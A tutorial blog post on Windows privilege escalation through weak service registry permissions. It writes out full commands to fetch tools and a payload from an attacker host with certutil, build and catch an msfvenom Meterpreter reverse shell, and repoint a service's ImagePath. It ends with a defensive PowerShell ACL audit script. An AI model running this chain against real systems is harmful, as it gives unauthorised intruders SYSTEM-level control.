Windows PrivEsc (5) -Weak Registry Permissions

Clement 'Tino
4 min read · Sep 29, 2022

This is the fifth post in the Windows PrivEsc series. You can read the first, which is about Unquoted Service Paths, the second, which is about Hijacking DLLs, the third, Exploiting Weak Service Permissions, and the fourth, Autorun Programs.

Windows Registry (what even …is that?)

The registry (or Windows registry) is a database of data, options, settings and other values for the software and devices installed on every edition of the Microsoft Windows operating system. When a piece of software is installed, a new subkey is created in the registry for it. That subkey holds the options specific to that program, including its main executable, its location and its version.

[screenshot: Windows Registry Editor]

Exploiting weak registry permissions

Modifying registry values is usually restricted to Administrator accounts. However, you will come across some services whose registry keys can be edited by a Standard account. In this Privilege Escalation technique, we will identify and modify such registry values from a Standard account. In the Windows Registry, most services are located under:

HKLM\SYSTEM\CurrentControlSet\services\<service name>

We start by already having a foothold on the Windows target. We are running as a Standard user with no Admin privileges.

[screenshot: standard user account]

The exploitation process consists of the following steps:

1. The first step uses a tool called winPEAS. This is an enumeration tool that, when executed on a Windows target, enumerates various Privilege Escalation vectors. We can use it to enumerate a list of services together with their registry values and the permissions on them. You can clone the winPEAS tool from GitHub.

After that, serve it on the attacker machine.

python -m SimpleHTTPServer

[screenshot: set up python web server]

Now download it onto your Windows target with the certutil utility.

certutil.exe -f -URLcache http://<ATTACKER-IP>:8000/winPEASx64.exe winPEASx64.exe

[screenshot: download it onto the target]

2. Now execute the binary. The output is usually large, so add the servicesinfo argument to limit the output to the services running on the target machine.

winPEASx64.exe servicesinfo

In the output, we can make out one insecure registry service configured on the target.

[screenshot: Insecure Registry service found]

3. Let's modify the service's ImagePath and replace it with our own custom executable. First, generate the executable with msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=<attacker IP> LPORT=6161 -o shell.exe

[screenshot: create a payload]

4. Now host shell.exe on a Python web server as before and upload it to the C:\Temp folder on the target using the certutil.exe utility.

[screenshot: upload payload to the target Temp folder]

5. Start a second listener, which will catch the reverse shell when shell.exe is executed. A Meterpreter handler in one line:

msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost <attacker-IP>; set lport 6161; run"

[screenshot: start your listener]

6. Now we can modify the ImagePath of the target registry service and point it at the location where we uploaded the custom executable we generated. This can be done by running the following in a Windows command shell:

reg add "HKLM\SYSTEM\CurrentControlSet\services\regsvc" /t REG_EXPAND_SZ /v ImagePath /d "C:\Temp\shell.exe" /f

/t = the data type of the value being written. There are many values under the regsvc key; ImagePath is stored as REG_EXPAND_SZ because it may contain environment variables.
/v = the value name under the selected key.
/d = the data to assign to the registry value being added.
/f = force overwrite of an existing registry entry without prompting.

[screenshot: modify weak registry ImagePath to payload]

7. Now that we've modified the registry, manually start the service with the command:

sc start regsvc

[screenshot: stop and start weak service]

8. In our second listener, the moment the service is started, we catch a privileged Meterpreter shell.

[screenshot: Admin shell]

With that we have identified a misconfiguration in the Windows Registry and leveraged it to escalate our privileges.
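The same misconfiguration can be audited from the defending side without winPEAS. The following PowerShell script is an added example (not part of the original post): it walks the service keys under HKLM\SYSTEM\CurrentControlSet\Services and reports any key on which Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE holds a right that allows rewriting ImagePath or re-ACLing the key, together with the current ImagePath so it can be compared with the expected binary. The function name Get-WeakServiceKeyAce is my own.

```powershell
# Added audit script (not from the original post): reports service keys under
# HKLM\SYSTEM\CurrentControlSet\Services on which a low-privileged principal holds
# write rights, the misconfiguration winPEAS flagged above. Runs as a standard user,
# since Get-Acl only needs read access to the key.

$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Well-known SIDs that should never be able to write a service key:
# Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE.
$LowPrivSids = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')

# Any of these rights lets the holder rewrite ImagePath or re-ACL the key.
$WriteRights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, ChangePermissions, TakeOwnership, FullControl'

function Get-WeakServiceKeyAce {
    Get-ChildItem -Path $ServicesKey -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }

            # Compare by SID so the check also works on localized Windows builds
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if ($LowPrivSids -notcontains $sid) { continue }
            if (($ace.RegistryRights -band $WriteRights) -eq 0) { continue }

            # ImagePath is the value the attack rewrites, so show its current contents
            $imagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            [PSCustomObject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited   # inherited from Services itself means every service is affected
                ImagePath = $imagePath
            }
        }
    }
}

Get-WeakServiceKeyAce | Format-Table -AutoSize
```

Every row returned is a key a standard user could repoint; remove the write ACE (via Set-Acl or the Permissions dialog in regedit) and verify that the listed ImagePath still points at the service's genuine binary.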

I hope this piece helped you as it did me. Reach out to me on Twitter @tinopreter, and follow me for more cybersecurity-related content while you're at it.
